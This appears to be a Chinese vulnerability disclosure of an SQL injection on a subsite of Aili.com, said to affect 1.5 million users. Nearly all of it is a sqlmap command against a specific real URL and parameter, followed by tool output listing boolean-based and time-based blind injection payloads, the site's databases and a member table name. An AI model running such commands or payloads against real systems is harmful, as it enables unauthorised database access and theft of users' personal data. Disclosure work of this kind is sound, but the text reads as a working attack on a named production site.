爱丽网某分站存在SQL注入漏洞(影响150万用户)

python sqlmap.py -u "http://plus.aili.com/topicLab/index.php?m=user&a=topicVote&callback=jsonp1460891080351&contentid=1793&type=clothv3_index&dosubmit=1&r=0.7601377370301634" -p contentid
 
 [23:26:53] [INFO] resuming back-end DBMS 'mysql' 
 [23:26:53] [INFO] testing connection to the target URL
 [23:26:53] [INFO] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
 [23:26:53] [INFO] it appears that the target is not protected
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Parameter: contentid (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: m=user&a=topicVote&callback=jsonp1460891080351&contentid=1793 AND 7039=7039&type=clothv3_index&dosubmit=1&r=0.7601377370301634
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: m=user&a=topicVote&callback=jsonp1460891080351&contentid=1793 AND SLEEP(5)&type=clothv3_index&dosubmit=1&r=0.7601377370301634
 ---

available databases [3]:
 
 [*] information_schema
 
 [*] newcms
 
 [*] test

dzxbbs_ucenter_members